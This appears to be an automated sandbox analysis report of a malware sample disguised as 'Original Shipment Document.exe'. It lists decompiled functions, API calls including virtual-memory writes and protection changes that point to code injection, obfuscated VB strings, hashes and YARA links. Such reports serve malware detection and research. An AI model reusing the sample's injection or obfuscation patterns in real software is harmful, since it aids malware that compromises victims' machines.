Opcode Fuzzy Hash: 54bd9ec976ea2e778cc55838d3fda6531665e7fa2c232a98364c7cff0efd7e8f
Instruction Fuzzy Hash: 11F04FB2B00508AB9B10DEDE8CC189EF3ACFB49214B10417BBA18D3301D675AE148794

Uniqueness

Uniqueness Score: -1.00%

Function 00448FC8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00448FC8(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x447c9c; // 0x447ce8
					if(E00403740( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E0044807C();
					}
					E00448D64(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}

0x00448fc9
0x00448fcf
0x00448fd4
0x00448fe1
0x00448ff2
0x00448fe3
0x00448fe8
0x00448fe8
0x00448ff9
0x00449000
0x00449000
0x00449007
0x00449007
0x00449010

APIs

CreatePopupMenu.USER32(?,00448CDB,00000000,00000000,00448D1F), ref: 00448FE3
CreateMenu.USER32(?,00448CDB,00000000,00000000,00448D1F), ref: 00448FED

Strings

|D, xrefs: 00448FD4

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMenu$Popup
String ID: |D
API String ID: 257293969-369764335
Opcode ID: 175400f916fd049017c829ea69ecdb06d0893ea4f299a6e6343027bb7d3e1c8d
Instruction ID: ae0e4bcc48897c05312c9a3f088783d237564c6e00bd86ed14947833835e0a4d
Opcode Fuzzy Hash: 175400f916fd049017c829ea69ecdb06d0893ea4f299a6e6343027bb7d3e1c8d
Instruction Fuzzy Hash: E2E0C9B0602100CBEB50AF26D5C161A3BA9AB08308F4064AEA9055F257CB79D885871C

Uniqueness

Uniqueness Score: -1.00%

Function 00435EA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00435EA0(intOrPtr __eax) {
				intOrPtr _t5;
				intOrPtr _t10;
				intOrPtr _t11;

				_t10 = __eax;
				ReleaseCapture();
				_t5 = 0;
				 *0x471990 = 0;
				if(_t10 != 0) {
					_t11 =  *0x434e14; // 0x434e60
					_t5 = E00403740(_t10, _t11);
					if(0 != 0) {
						L4:
						return SetCapture(E0043F370(_t10));
					}
					if( *((intOrPtr*)(_t10 + 0x30)) != 0) {
						 *0x471990 = _t10;
						_t10 =  *((intOrPtr*)(_t10 + 0x30));
						goto L4;
					}
				}
				return _t5;
			}

0x00435ea1
0x00435ea3
0x00435ea8
0x00435eaa
0x00435eb1
0x00435eb5
0x00435ebb
0x00435ec2
0x00435ed3
0x00000000
0x00435edb
0x00435ec8
0x00435eca
0x00435ed0
0x00000000
0x00435ed0
0x00435ec8
0x00435ee1

APIs

ReleaseCapture.USER32(00000000,00438F19,0000FFB8,?,00462506), ref: 00435EA3
SetCapture.USER32(00000000,00000000,00438F19,0000FFB8,?,00462506), ref: 00435EDB

Strings

`NC, xrefs: 00435EB5

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Capture$Release
String ID: `NC
API String ID: 1520983071-918118547
Opcode ID: b85d66c93e12e83c2bfffce08f8152cbb9d144816137039291df0b714677608e
Instruction ID: ed97f3f78fc21c378f8b6ef23837cb0e45adc9d6c1dbb0d4e98436b8d169363f
Opcode Fuzzy Hash: b85d66c93e12e83c2bfffce08f8152cbb9d144816137039291df0b714677608e
Instruction Fuzzy Hash: E1E04FF061070047CB50AF7AD8C22132298BB4C345F80217AAD08973A2D77CD989C61C

Uniqueness

Uniqueness Score: -1.00%

Function 004065CD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065CD(void* __eax, void* __ebx, void* __esi) {
				long _t10;

				 *((intOrPtr*)(__ebx + 0x69)) =  *((intOrPtr*)(__ebx + 0x69)) + __esi;
				 *0x471008 = 2;
				 *0x48f04a = 2;
				 *0x48f000 = E004052A8;
				if(E004033FC() != 0) {
					_t5 = E0040342C();
				}
				E004034F0(_t5);
				 *0x48f050 = 0xd7b0;
				 *0x48f21c = 0xd7b0;
				 *0x48f3e8 = 0xd7b0;
				E004051A0();
				 *0x48f03c = GetCommandLineA();
				 *0x48f038 = E00401388();
				_t10 = GetCurrentThreadId();
				 *0x48f030 = _t10;
				return _t10;
			}

0x004065d2
0x004065d5
0x004065dc
0x004065e3
0x004065f4
0x004065f6
0x004065f6
0x004065fb
0x00406600
0x00406609
0x00406612
0x0040661b
0x00406625
0x0040662f
0x00406634
0x00406639
0x0040663e

APIs

Part of subcall function 004033FC: GetKeyboardType.USER32(00000000), ref: 00403401
Part of subcall function 004033FC: GetKeyboardType.USER32(00000001), ref: 0040340D

GetCommandLineA.KERNEL32 ref: 00406620
GetCurrentThreadId.KERNEL32 ref: 00406634

Part of subcall function 0040342C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040344E
Part of subcall function 0040342C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403481
Part of subcall function 0040342C: RegCloseKey.ADVAPI32(?,004034A4,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403497

Strings

4P, xrefs: 00406625

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
String ID: 4P
API String ID: 3316616684-390938097
Opcode ID: eca3d6c4e4a7be74c21a476ab9ceeace13b9191205d81d5110f2270218007f3d
Instruction ID: 921cd526b7e105861bd068cdc08f73202cc46adcbd387c4b2a671db1257e2c86
Opcode Fuzzy Hash: eca3d6c4e4a7be74c21a476ab9ceeace13b9191205d81d5110f2270218007f3d
Instruction Fuzzy Hash: C7F0127081034099E700FFB5A88620D3A60AF0334D760497FE840AA2B7DB7C414D8B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00436A80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00436A80(struct tagPOINT* __eax) {
				struct HWND__* _t8;
				void* _t9;

				_push(__eax->y);
				_t8 = WindowFromPoint( *__eax);
				if(_t8 != 0) {
					while(E00436A38(_t8, _t9) == 0) {
						_t8 = GetParent(_t8);
						if(_t8 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t8;
			}

0x00436a81
0x00436a8b
0x00436a8f
0x00436a91
0x00436aa2
0x00436aa6
0x00000000
0x00000000
0x00000000
0x00436aa6
0x00436a91
0x00436aa8
0x00436aab

APIs

WindowFromPoint.USER32(iiC,?,00000000,00436662,?,0048FB90,?), ref: 00436A86

Part of subcall function 00436A38: GlobalFindAtomA.KERNEL32 ref: 00436A4C
Part of subcall function 00436A38: GetPropA.USER32 ref: 00436A63

GetParent.USER32(00000000), ref: 00436A9D

Strings

iiC, xrefs: 00436A84

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomFindFromGlobalParentPointPropWindow
String ID: iiC
API String ID: 3524704154-3819825529
Opcode ID: 02aa3e4fa4b1554d88ae2329db57164ebe9a328072c93d76f6589d099d5d56e2
Instruction ID: decc06476659a983144d3a70f900a89e14417d2836ec137dd71b04f47f17c098
Opcode Fuzzy Hash: 02aa3e4fa4b1554d88ae2329db57164ebe9a328072c93d76f6589d099d5d56e2
Instruction Fuzzy Hash: 89D092613003072BAF113AAA8CC192A26885F2B319B52E47FBA017A263DE69CC185318

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Original Shipment Document.exe PID: 5852 Parent PID: 4072 Original Shipment Document.exeCOMMON

Executed Functions

Function 004015DC, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 613COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015E1

Strings

VB5!6&*, xrefs: 004015DC
liVm, xrefs: 00401BA7

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*$liVm
API String ID: 1341478452-2840256730
Opcode ID: 1bcbf1d65d74ee7615e1b583057abd07165a60bf4b1b56e45a49e5b6ca64827e
Instruction ID: 9f1d11505309b300c767f6c80390e6a95dc52929b7ff6729520afa9406f40154
Opcode Fuzzy Hash: 1bcbf1d65d74ee7615e1b583057abd07165a60bf4b1b56e45a49e5b6ca64827e
Instruction Fuzzy Hash: 9912AB7240E3C19FC7138B7488A56967FB0EE5332471E45EBD4C0DF1A3D229694ACBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02340F5E, Relevance: 1.8, APIs: 1, Instructions: 255nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0234122C

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 283aa65546196ffeb521c702a53f6fed5ae18d66de6e09addd5274fda7dde12d
Instruction ID: dcc7cdbb4c62a99c5c7a10300b48519b973bfa6b799dfa6e9ddc0f13650e8bc6
Opcode Fuzzy Hash: 283aa65546196ffeb521c702a53f6fed5ae18d66de6e09addd5274fda7dde12d
Instruction Fuzzy Hash: 5571E6B16102056BEB314F20CC89BDA76B6FF45744F108164FA48EB2D0CBB8B5948F65

Uniqueness

Uniqueness Score: -1.00%

Function 02340F8C, Relevance: 1.8, APIs: 1, Instructions: 255nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0234223D: LoadLibraryA.KERNELBASE(?,8802EDAC,?,023425BF,0234010D,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,000000FF,00000000), ref: 02342287

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0234122C

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: e36d57a94bb4827dfab9009e12f5c158ac6ef2dcc9b6fecf404f6901d1dc9c76
Instruction ID: 6cb9ed8fa31d42d2a24ffaa032dc8091aaa3638bbfac340d4b92ae67e65eb6e1
Opcode Fuzzy Hash: e36d57a94bb4827dfab9009e12f5c158ac6ef2dcc9b6fecf404f6901d1dc9c76
Instruction Fuzzy Hash: 3581E4B1600249AFEB315F20CC85BDA7AB2FF45744F108164FE48AB2D0CBB9B5958F54

Uniqueness

Uniqueness Score: -1.00%

Function 02341167, Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 0234122C

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: fa39eafd0dd2887a577f34adff6ae206eaa1fe656961efc73cc2c97bfad98b6d
Instruction ID: b92470fe86f897b9d165cb8872ab0eb8feae8764c1c1f19d2bfcfd7d81e594b6
Opcode Fuzzy Hash: fa39eafd0dd2887a577f34adff6ae206eaa1fe656961efc73cc2c97bfad98b6d
Instruction Fuzzy Hash: 6931E5B15100096BEB718E50CD88BDA37AAFF08388F544050FE9DD6250CFB4BAC49F62

Uniqueness

Uniqueness Score: -1.00%

Function 02341AEA, Relevance: 1.5, APIs: 1, Instructions: 40libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,02341585,?,02340229,?,?,?,?,?,?,?,023400B8), ref: 02341B51

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3898fe78a01e828bae0903bc59dec2e849d8d97af52d79237d40f24cf88ea45d
Instruction ID: 3d52cc0f6d0d0872196ad3588395a2a5ec9ce74d68d2686568bd592aaebd7dab
Opcode Fuzzy Hash: 3898fe78a01e828bae0903bc59dec2e849d8d97af52d79237d40f24cf88ea45d
Instruction Fuzzy Hash: D901FF3115F7D199C7228B3486AA583BFF0BF53200B2CD0DDC4C109467C6A1AA62EBDB

Uniqueness

Uniqueness Score: -1.00%

Function 02342A10, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,023427D4,00000040,023401FE,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02342A29

Memory Dump Source

Source File: 00000001.00000002.273434874.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 00408610, Relevance: 87.8, APIs: 31, Strings: 19, Instructions: 349
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00408610(void* __ebx, void* __edi, void* __esi, signed int _a8) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				signed int _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v108;
				void* _t139;
				void* _t142;
				void* _t147;
				char* _t148;
				char* _t150;
				void* _t159;
				void* _t160;
				void* _t162;
				void* _t168;
				void* _t174;
				intOrPtr* _t250;
				intOrPtr* _t252;
				intOrPtr* _t253;
				signed int _t255;
				signed int _t256;
				void* _t257;
				void* _t259;
				intOrPtr _t260;

				_t260 = _t259 - 0xc;
				 *[fs:0x0] = _t260;
				_v16 = _t260 - 0x58;
				asm("hlt");
				_v8 = E004011E0;
				_t255 = _a8;
				_v4 = _t255 & 0x00000001;
				_t256 = _t255 & 0xfffffffe;
				_a8 = _t256;
				 *((intOrPtr*)( *_t256 + 4))(_t256, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t257);
				_v52 = 0;
				_v56 = 0;
				_v60 = 0;
				_v64 = 0;
				_v68 = 0;
				_v72 = 0;
				_v76 = 0;
				_v84 = 0;
				_v80 = 0;
				_v92 = 0;
				_v88 = 0;
				__imp__#707(1, 0); // executed
				__imp____vbaStrMove();
				_v60 = 0;
				 *((intOrPtr*)( *_t256 + 0x714))(_t256, L"selvherskeres",  &_v60);
				_v60 = 0x1c3b;
				__imp____vbaStrCopy();
				_t139 =  *((intOrPtr*)( *_t256 + 0x718))(_t256, 0x68180000, 0x4202a0ee,  &_v56, 0xffffffff, 0x5feb,  &_v60);
				__imp____vbaFreeStr();
				_v92 = 0xcc8c4640;
				_v88 = 0x5b01;
				_v84 = 0xff580000;
				_v80 = 0x4202a0a7;
				__imp____vbaUI1I2( &_v84, 0x97280000, 0x4202a134,  &_v92, 0x4fa5);
				 *((intOrPtr*)( *_t256 + 0x71c))(_t256, _t139);
				_v84 = 0xf0ef9c0;
				_v80 = 0x5aff;
				__imp____vbaStrCopy();
				_v72 = 0x4b2fcf62;
				_t142 =  *((intOrPtr*)( *_t256 + 0x6f8))(_t256,  &_v72,  &_v56, 0xffffffff,  &_v84, L"KULBUELYS");
				if(_t142 < 0) {
					__imp____vbaHresultCheckObj(_t142, _t256, 0x4076d8, 0x6f8);
				}
				__imp____vbaFreeStr();
				_v92 = 0xbb780000;
				_v88 = 0x4202a0b3;
				_v84 = 0xa6a84eb0;
				_v80 = 0x5af7;
				_v60 = 0x5b62;
				 *((intOrPtr*)( *_t256 + 0x720))(_t256, 0,  &_v60, 0x485b8e00, 0x5aff,  &_v84, 0x6361,  &_v92, 0x4b681b2e);
				_v72 = 0x4b884fb4;
				_v60 = 0x722b;
				_t147 =  *((intOrPtr*)( *_t256 + 0x6fc))(_t256, 0x47d5,  &_v60,  &_v72, 0x4b598708,  &_v76);
				if(_t147 < 0) {
					__imp____vbaHresultCheckObj(_t147, _t256, 0x4076d8, 0x6fc);
				}
				_t148 =  &_v92;
				_v84 = 0x3a480000;
				_v80 = 0x4202a0de;
				_v60 = 0;
				__imp____vbaUI1I2( &_v60, L"Rendestenssprogs", L"Forhandlingspuljens5",  &_v84, _t148);
				 *((intOrPtr*)( *_t256 + 0x724))(_t256, _t148);
				_v64 = 0x1202;
				_v60 = 0;
				__imp____vbaStrCopy();
				_t150 =  &_v68;
				_v84 = 0x72e37050;
				_v80 = 0x5af7;
				__imp____vbaUI1I2( &_v64, 0x61880000, 0x4202a0db, _t150);
				 *((intOrPtr*)( *_t256 + 0x728))(_t256,  &_v84, 0xac5d8e20, 0x5b00,  &_v56,  &_v60, _t150);
				_t250 = __imp____vbaFreeStr; // 0x660e6bec
				 *_t250();
				_v72 = 0x4b563530;
				__imp____vbaStrCopy();
				_t81 =  &_v72; // 0x4b563530
				_v84 = 0x96500000;
				_v80 = 0x4202a2f5;
				 *((intOrPtr*)( *_t256 + 0x72c))(_t256,  &_v84, 0x4b5f1af6,  &_v56, _t81, L"LETTERER", 0xffffffff,  &_v60);
				 *_t250();
				_v84 = 0x272a7680;
				_v80 = 0x5afd;
				_t159 =  *((intOrPtr*)( *_t256 + 0x700))(_t256,  &_v84,  &_v60);
				if(_t159 < 0) {
					__imp____vbaHresultCheckObj(_t159, _t256, 0x4076d8, 0x700);
				}
				_t93 =  &_v72; // 0x4b563530
				_v72 = 0x4b43ca62;
				__imp____vbaUI1I2(_t93, L"Conclusively");
				_t160 =  *((intOrPtr*)( *_t256 + 0x704))(_t256, _t159);
				if(_t160 < 0) {
					__imp____vbaHresultCheckObj(_t160, _t256, 0x4076d8, 0x704);
				}
				__imp____vbaStrCopy();
				_v60 = 0x56fc;
				_v76 = 0x4b898a46;
				_v72 = 0x4b2007c6;
				_t162 =  *((intOrPtr*)( *_t256 + 0x708))(_t256,  &_v72, 0x81ae13,  &_v76,  &_v60,  &_v56);
				if(_t162 < 0) {
					__imp____vbaHresultCheckObj(_t162, _t256, 0x4076d8, 0x708);
				}
				__imp____vbaFreeStr();
				_t252 = __imp____vbaUI1I2;
				_v68 = 0xffffffff;
				_v64 =  *_t252();
				_v60 =  *_t252();
				_v108 =  *_t256;
				_t168 =  *((intOrPtr*)(_v108 + 0x70c))(_t256,  &_v60, 0x245b4b,  &_v64,  *_t252( &_v68));
				if(_t168 < 0) {
					__imp____vbaHresultCheckObj(_t168, _t256, 0x4076d8, 0x70c);
				}
				_t253 = __imp____vbaStrCopy;
				 *_t253();
				 *((intOrPtr*)( *_t256 + 0x730))(_t256,  &_v56, 0xffffffff);
				__imp____vbaFreeStr();
				 *_t253();
				_v92 = 0x6f100000;
				_v88 = 0x4202a2f8;
				_v84 = 0xe160e420;
				_v80 = 0x5af9;
				 *((intOrPtr*)( *_t256 + 0x734))(_t256, L"HOISTERS", 0xffffffff, L"carboxylsyrens",  &_v84,  &_v92,  &_v56, 0x4b24fc90,  &_v60);
				__imp____vbaFreeStr(); // executed
				_t174 = E0040A340(0, _t253, _t256); // executed
				_v4 = 0;
				asm("wait");
				__imp____vbaFreeStr(E00408ADD);
				return _t174;
			}

0x00408613
0x00408622
0x0040862f
0x00408631
0x00408632
0x00408639
0x00408641
0x00408644
0x0040864a
0x0040864d
0x00408655
0x00408658
0x0040865b
0x0040865e
0x00408661
0x00408664
0x00408667
0x0040866a
0x0040866d
0x00408670
0x00408673
0x00408676
0x00408681
0x00408693
0x00408696
0x004086a4
0x004086ab
0x004086cd
0x004086d6
0x004086fa
0x00408701
0x00408708
0x0040870f
0x00408716
0x0040871e
0x0040872c
0x00408733
0x0040873a
0x00408742
0x0040875d
0x00408765
0x00408773
0x00408773
0x0040877c
0x004087a6
0x004087ad
0x004087b4
0x004087bb
0x004087c2
0x004087c9
0x004087e8
0x004087ef
0x004087f6
0x004087fe
0x0040880c
0x0040880c
0x00408814
0x0040882f
0x00408836
0x0040883d
0x00408840
0x00408848
0x00408856
0x0040885d
0x00408860
0x00408868
0x0040887f
0x00408886
0x0040888d
0x004088ab
0x004088b1
0x004088ba
0x004088c4
0x004088cb
0x004088de
0x004088f0
0x004088f7
0x004088fe
0x00408907
0x00408914
0x0040891b
0x00408922
0x0040892a
0x00408938
0x00408938
0x00408945
0x0040894e
0x00408955
0x0040895d
0x00408965
0x00408973
0x00408973
0x00408981
0x0040899f
0x004089a6
0x004089ad
0x004089b4
0x004089bc
0x004089ca
0x004089ca
0x004089d3
0x004089d9
0x004089e4
0x004089f2
0x004089f9
0x00408a05
0x00408a1c
0x00408a24
0x00408a32
0x00408a32
0x00408a38
0x00408a46
0x00408a51
0x00408a5a
0x00408a68
0x00408a8e
0x00408a95
0x00408a9c
0x00408aa3
0x00408aaa
0x00408ab3
0x00408ab9
0x00408abe
0x00408ac1
0x00408ad6
0x00408adc

APIs

#707.MSVBVM60(00000001,00000000), ref: 00408676
__vbaStrMove.MSVBVM60 ref: 00408681
__vbaStrCopy.MSVBVM60 ref: 004086AB
__vbaFreeStr.MSVBVM60 ref: 004086D6
__vbaUI1I2.MSVBVM60(?,97280000,4202A134,?,00004FA5), ref: 00408716
__vbaStrCopy.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 0040873A
__vbaHresultCheckObj.MSVBVM60(00000000,004011E0,004076D8,000006F8), ref: 00408773
__vbaFreeStr.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 0040877C
__vbaHresultCheckObj.MSVBVM60(00000000,004011E0,004076D8,000006FC), ref: 0040880C
__vbaUI1I2.MSVBVM60(0000722B,Rendestenssprogs,Forhandlingspuljens5,A6A84EB0,BB780000), ref: 00408840
__vbaStrCopy.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 00408860
__vbaUI1I2.MSVBVM60(00001202,61880000,4202A0DB,?), ref: 0040888D
__vbaFreeStr.MSVBVM60(004011E0,72E37050,AC5D8E20,00005B00,?,0000722B,00000000), ref: 004088AB
__vbaFreeStr.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 004088BA
__vbaStrCopy.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 004088CB
__vbaFreeStr.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 00408907
__vbaHresultCheckObj.MSVBVM60(00000000,004011E0,004076D8,00000700), ref: 00408938
__vbaUI1I2.MSVBVM60(05VK,Conclusively), ref: 00408955
__vbaHresultCheckObj.MSVBVM60(00000000,004011E0,004076D8,00000704), ref: 00408973
__vbaStrCopy.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 00408981
__vbaHresultCheckObj.MSVBVM60(00000000,004011E0,004076D8,00000708), ref: 004089CA
__vbaFreeStr.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 004089D3
__vbaUI1I2.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 004089EB
__vbaUI1I2.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 004089F5
__vbaUI1I2.MSVBVM60(FFFFFFFF), ref: 00408A08
__vbaHresultCheckObj.MSVBVM60(00000000,004011E0,004076D8,0000070C), ref: 00408A32
__vbaStrCopy.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 00408A46
__vbaFreeStr.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 00408A5A
__vbaStrCopy.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 00408A68
__vbaFreeStr.MSVBVM60(?,?,?,?,97280000,4202A134,?,00004FA5), ref: 00408AB3
__vbaFreeStr.MSVBVM60(00408ADD), ref: 00408AD6

Strings

`, xrefs: 004088EB, 00408896, 00408792, 0040890F, 0040874E, 00408818
carboxylsyrens, xrefs: 00408A81
KULBUELYS, xrefs: 00408749
Conclusively, xrefs: 00408940
MANISM, xrefs: 00408A3E
05VK, xrefs: 004088DE, 004088E1
`, xrefs: 00408A7D, 00408A80
MAVEFORKLELSERNES, xrefs: 0040869C
selvherskeres, xrefs: 0040868D
Rendestenssprogs, xrefs: 00408821
acerous, xrefs: 00408979
Calorize8, xrefs: 00408724
halvlegsresultats, xrefs: 0040884E
Tredjebehandle2, xrefs: 004088BC
HOISTERS, xrefs: 00408A88
+r, xrefs: 004087EF
LETTERER, xrefs: 004088D9
SUPERIMPLY, xrefs: 00408A60
Forhandlingspuljens5, xrefs: 0040881C

Memory Dump Source

Source File: 00000001.00000001.233837521.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.233845027.000000000040C000.00000040.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$CheckHresult$#707Move
String ID: `$ `$+r$05VK$Calorize8$Conclusively$Forhandlingspuljens5$HOISTERS$KULBUELYS$LETTERER$MANISM$MAVEFORKLELSERNES$Rendestenssprogs$SUPERIMPLY$Tredjebehandle2$acerous$carboxylsyrens$halvlegsresultats$selvherskeres
API String ID: 2909496914-3382133903
Opcode ID: bd28180060b8b57bdfc957defdd886914740af58e83167e553079a2dd2409b4e
Instruction ID: cc60e7946e3a8da7da69fb4e89989b0c3191fef82d66864900b3141a45d04333
Opcode Fuzzy Hash: bd28180060b8b57bdfc957defdd886914740af58e83167e553079a2dd2409b4e
Instruction Fuzzy Hash: 7DE11AB1D01209AFDB04DFD4DD889EEBBB8EF48300F10852AF516BA694DB782945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00409AD0, Relevance: 45.7, APIs: 22, Strings: 4, Instructions: 165COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00409B28
__vbaStrCat.MSVBVM60(00407C18,00407C0C), ref: 00409B3E
#520.MSVBVM60(?,?), ref: 00409B52
__vbaStrCat.MSVBVM60(00407C18,00407C18), ref: 00409B62
__vbaVarTstEq.MSVBVM60(?,?), ref: 00409B76
__vbaFreeVarList.MSVBVM60(00000003,00000008,?,00008008), ref: 00409B8D
#689.MSVBVM60(BIPECTINATE,Prenticing7,TILBEREDNINGENS), ref: 00409BCE
__vbaStrMove.MSVBVM60 ref: 00409BD9
__vbaStrCmp.MSVBVM60(00000000,00000000), ref: 00409BE7
__vbaFreeStr.MSVBVM60 ref: 00409BF5
#606.MSVBVM60(00000001,00000008), ref: 00409C18
